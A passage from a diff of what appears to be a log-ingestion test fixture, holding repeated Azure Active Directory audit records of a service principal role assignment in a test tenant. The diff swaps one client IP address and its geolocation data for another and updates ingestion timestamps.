Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:17:00.2133065Z\"},{\"Name\":\"env_epoch\",\"Value\":\"OLE3R\"},{\"Name\":\"env_seqNum\",\"Value\":\"55908041\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##53a69eec-6bcd-473f-9c68-150d680e0776_00000000-0000-0000-0000-000000000000_53a69eec-6bcd-473f-9c68-150d680e0776\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR551\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\
"Value\":\"R5\"}],\"Id\":\"7bca6665-4d58-4df9-bd34-4d92e1fc63aa\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125073500Z", + "original": 
"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:17:00\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"b2484c3c-5461-43ab-850b-70fccf706796\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:17:00.2133065Z\"},{\"Name\":\"env_epoch\",\"Value\":\"OLE3R\"},{\"Name\":\"env_seqNum\",\"Value\":\"55908041\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##53a69eec-6bcd-473f-9c68-150d680e0776_00000000-0000-0000-0000-000000000000_53a69eec-6bcd-473f-9c68-150d680e0776\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR551\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\
"Value\":\"R5\"}],\"Id\":\"7bca6665-4d58-4df9-bd34-4d92e1fc63aa\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", 
@@ -8812,25 +8056,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -8844,7 +8070,7 @@ "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -8980,7 +8206,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { 
@@ -8992,12 +8218,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036356200Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:17:00\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"b2484c3c-5461-43ab-850b-70fccf706796\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:17:00.2133065Z\"},{\"Name\":\"env_epoch\",\"Value\":\"OLE3R\"},{\"Name\":\"env_seqNum\",\"Value\":\"55908041\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##53a69eec-6bcd-473f-9c68-150d680e0776_00000000-0000-0000-0000-000000000000_53a69eec-6bcd-473f-9c68-150d680e0776\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR551\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\
"Value\":\"R5\"}],\"Id\":\"7bca6665-4d58-4df9-bd34-4d92e1fc63aa\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125080400Z", + "original": 
"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:17:00\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"b2484c3c-5461-43ab-850b-70fccf706796\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:17:00.2133065Z\"},{\"Name\":\"env_epoch\",\"Value\":\"OLE3R\"},{\"Name\":\"env_seqNum\",\"Value\":\"55908041\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##53a69eec-6bcd-473f-9c68-150d680e0776_00000000-0000-0000-0000-000000000000_53a69eec-6bcd-473f-9c68-150d680e0776\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR551\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\
"Value\":\"R5\"}],\"Id\":\"7bca6665-4d58-4df9-bd34-4d92e1fc63aa\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", 
@@ -9023,25 +8249,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -9055,7 +8263,7 @@ "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -9191,7 +8399,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { 
@@ -9203,12 +8411,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036360900Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:17:45\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
